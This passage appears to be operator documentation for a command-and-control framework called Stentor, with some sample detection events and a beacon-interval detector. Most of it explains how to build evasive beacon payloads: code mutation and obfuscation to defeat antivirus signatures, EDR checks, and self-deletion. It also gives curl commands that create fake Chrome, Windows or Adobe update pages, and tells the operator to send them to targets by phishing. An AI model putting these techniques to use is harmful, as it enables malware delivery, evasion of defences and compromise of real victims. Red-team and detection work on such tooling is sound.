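    {"Channel": "Sysmon", "EventID": 1, "Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "regsvr32 /s /n /u /i:https://cdn.example.invalid/update.sct scrobj.dll"},
    {"Channel": "Sysmon", "EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -w hidden"},
    {"Channel": "Sysmon", "EventID": 7, "Image": r"C:\Program Files\Vendor\App\app.exe",
     "ImageLoaded": r"C:\Program Files\Vendor\App\version.dll", "Signed": "false"},
    {"Channel": "Sysmon", "EventID": 7,
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "ImageLoaded": r"C:\Users\jsmith\Downloads\pricing.xll", "Signed": "false"},
    {"Channel": "System", "EventID": 7045, "ServiceName": "StentorSvc",
     "ImagePath": r"C:\ProgramData\svc\beacon-svc64.exe"},
    {"Channel": "Sysmon", "EventID": 7, "Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll", "Signed": "true"},  # benign
]
```

The rules are deliberately narrow (one indicator each) so that a chained delivery such as HTML smuggling into an ISO into an LNK still produces at least the process-creation finding at the execution step.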


Common Options

These options apply across all or most payload formats.

Architecture

"architecture": "x64"

Target architecture: x64 (default) or x86. Most modern Windows environments are 64-bit -- use x86 only when targeting 32-bit processes or legacy systems.

Obfuscation

"obfuscate": true

Enables Garble obfuscation during compilation. Each build produces a unique binary hash, defeating signature-based detection. Increases build time by ~30-60 seconds.

Exit Function

"exit_func": "thread"

Controls how the beacon terminates: process (default) calls ExitProcess -- terminates the entire host process. thread calls ExitThread -- terminates only the beacon thread, leaving the host process running. Use thread when injected into a legitimate process you want to keep alive.

Kill Date

"kill_date": "2026-06-01T00:00:00Z"

RFC3339 expiration date. After this date, the payload self-terminates on startup and running beacons terminate on their next poll cycle. Use kill dates to limit exposure windows during time-boxed engagements.

Malleable Profile

"profile": "jquery"

Malleable C2 profile name for traffic customization. Profiles control HTTP request/response transforms, headers, URIs, and other network indicators. See Malleable Profiles for details.

Sleep & Jitter

"sleep": 60,
"jitter": 25

Beacon callback interval in seconds and jitter percentage (0-100). Higher sleep values reduce network noise; jitter adds randomness to callback timing to avoid periodic-pattern detection.
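The sleep and jitter values define the callback schedule; the added example below (not Stentor code) simulates that schedule, assuming jitter is applied symmetrically as plus or minus jitter percent since the page does not give the formula, and runs the interval-dispersion check a network analyst applies to the connections between one host pair.

```python
"""Interval analysis of beacon callbacks.

Added example, not Stentor code. It simulates the callback schedule implied
by the sleep and jitter settings (assuming jitter is applied symmetrically as
plus or minus jitter percent; the guide does not give the exact formula) and
computes the scale-free dispersion statistic a network analyst uses to spot
beaconing among the connections between one source and one destination.
"""
from __future__ import annotations

import random
import statistics
from typing import Sequence


def callback_times(sleep: float, jitter: int, count: int, seed: int = 7) -> list[float]:
    """Timestamps (seconds from 0) of `count` callbacks with the given sleep/jitter."""
    if not 0 <= jitter <= 100:
        raise ValueError("jitter must be a percentage between 0 and 100")
    rng = random.Random(seed)  # seeded so the simulation is reproducible
    t, times = 0.0, []
    for _ in range(count):
        t += sleep * (1 + rng.uniform(-jitter, jitter) / 100)
        times.append(t)
    return times


def human_like_times(mean_gap: float, count: int, seed: int = 7) -> list[float]:
    """Control data: exponentially distributed gaps, the shape of user-driven traffic."""
    rng = random.Random(seed)
    t, times = 0.0, []
    for _ in range(count):
        t += rng.expovariate(1 / mean_gap)
        times.append(t)
    return times


def interval_profile(times: Sequence[float]) -> dict:
    """Inter-arrival statistics for one connection pair.

    dispersion = IQR / median of the gaps: 0 for a fixed sleep, about 0.25
    for +/-25% jitter, well above 1 for user-driven traffic."""
    if len(times) < 5:
        raise ValueError("need at least 5 connections for a meaningful profile")
    gaps = sorted(b - a for a, b in zip(times, times[1:]))
    q1, median, q3 = statistics.quantiles(gaps, n=4)
    if median <= 0:
        raise ValueError("non-positive median gap")
    return {"connections": len(times), "median_gap": median, "dispersion": (q3 - q1) / median}


def is_beaconing(times: Sequence[float], min_connections: int = 20,
                 max_dispersion: float = 0.5) -> bool:
    """Flag a pair whose gaps cluster tightly around a stable interval."""
    profile = interval_profile(times)
    return profile["connections"] >= min_connections and profile["dispersion"] <= max_dispersion
```

The point to take from it is that 25% jitter narrows but does not remove the periodic signature; dispersion-based detectors still separate it from human-driven traffic, so raising sleep matters more than raising jitter for callback volume.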

Auto-Hosting

"host_uri": "/updates/patch.exe"

Automatically serve the generated payload at the specified URI path on the listener. The response includes the full hosted_url. URI must start with / and cannot use /api/ or /c2/ prefixes.

Code Mutation

"code_mutation": true

Enable per-build code mutation to make each generated payload unique at the binary level. The mutation engine applies 4 techniques at compile time:

| Technique | Description |
|---|---|
| Junk code insertion | Adds realistic-looking Win32 API call sequences (12 API pool) that execute but have no functional impact |
| Opaque predicates | Inserts conditional branches with mathematically predetermined outcomes (7 predicate generators) |
| Control flow transforms | Restructures basic blocks and loop patterns to change the CFG signature |
| Constant mutation | Replaces integer/string constants with equivalent computed expressions |

Generated mutation code is placed in package beacon with init() + runtime.KeepAlive to prevent dead code elimination. Each build produces a binary with different code patterns, defeating signature-based AV detection.

Code mutation is applied to all 5 direct-compile payload types (EXE, DLL, Service DLL, XLL, Shellcode). Stagers are excluded (they import internal/stager, not internal/beacon).

Artifact Tracking

When code mutation is enabled, the build records a "Code Mutation" artifact for tracking. See MITRE ATT&CK Integration for details on artifact tracking.

OPSEC Guardrails

Configure runtime execution guardrails to prevent beacon execution in unauthorized environments.

```json
"guardrails": {
  "kill_date": "2026-03-31",
  "working_hours": "08:00-18:00",
  "working_days": "Mon-Fri",
  "timezone": "America/New_York",
  "geofence_ips": ["10.10.10.0/24"],
  "geofence_hostnames": ["WS01", "WS02", "DC01"],
  "geofence_domains": ["corp.local"],
  "geofence_usernames": ["labuser", "CORP\\jsmith"],
  "dns_canary": "canary.yourdomain.com",
  "edr_check": true
}
```

| Field | Type | Description |
|---|---|---|
| kill_date | string | Date after which the beacon self-terminates (YYYY-MM-DD format) |
| working_hours | string | Hours during which the beacon is active (HH:MM-HH:MM) |
| working_days | string | Days during which the beacon is active (Mon-Fri, etc.) |
| timezone | string | Windows timezone for working hours (16 common zones mapped) |
| geofence_ips | array | Allowed IP/CIDR ranges -- beacon exits if not in range |
| geofence_hostnames | array | Allowed hostnames -- beacon exits if hostname doesn't match |
| geofence_domains | array | Allowed domains -- beacon exits if not domain-joined to listed domain |
| geofence_usernames | array | Allowed usernames -- beacon exits if running as unlisted user |
| dns_canary | string | DNS canary domain -- beacon resolves this and trips if detected (analyst canary) |
| edr_check | bool | Run EDR detection check on startup (10 vendor signatures) |

Geofencing is re-checked every 10 poll cycles (not every cycle) to minimize detection risk. Working hours suppression uses a single long obfuscated sleep instead of rapid check-sleep loops. The CleanupArtifacts function removes scheduled task names, registry patterns, and self-deletes the beacon binary via a batch file on exit.

Transport Selection

"transport": "quic"

Select the C2 transport protocol. The transport is auto-detected from the listener type in the UI, but can be explicitly set in the API.

| Transport | Value | Description |
|---|---|---|
| HTTP | http | Unencrypted HTTP (lab only) |
| HTTPS | https | TLS-encrypted HTTP (recommended default) |
| QUIC | quic | HTTP/3 over QUIC/UDP with TLS 1.3 |
| DNS | dns | DNS-based C2 (low bandwidth, high stealth) |
| SMB | smb | Named pipe C2 (internal pivoting) |

See QUIC Listener for details on the QUIC transport.


Drive-By Delivery

Create a social engineering landing page that hosts a payload download disguised as a legitimate software update.

POST /api/v1/payloads/{id}/driveby

| Field | Type | Required | Description |
|---|---|---|---|
| template | string | Yes | Page template: chrome, windows, adobe |
| auto_download | bool | No | Trigger download automatically on page load |

```bash
# Generate a payload first
PAYLOAD_ID=$(curl -s -X POST https://stentor.app/api/v1/payloads/generate \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "delivery_type": "exe",
    "listener_id": "6ea88162-d558-404a-a19f-4b4cab34b22f"
  }' | jq -r '.id')

# Create a drive-by page using the Chrome update template
curl -s -X POST "https://stentor.app/api/v1/payloads/$PAYLOAD_ID/driveby" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "template": "chrome",
    "auto_download": true
  }'
```

Response:

```json
{
  "driveby_url": "http://10.0.0.50/update/chrome/<payload-id>?auto=true",
  "payload_url": "http://10.0.0.50/payload/<payload-id>",
  "template": "chrome",
  "payload_id": "<payload-id>"
}
```

Available templates:

| Template | Impersonates | Best For |
|---|---|---|
| chrome | Google Chrome update | Broad targeting -- Chrome is the most common browser |
| windows | Windows system update | Enterprise environments with update awareness |
| adobe | Adobe product update | Environments with Adobe software installed |

Drive-by workflow

  1. Generate a payload with the desired format
  2. Create a drive-by page with an appropriate template
  3. Send the driveby_url to targets via phishing email, watering hole, or social engineering
  4. Monitor payload downloads via the download_count field on the payload object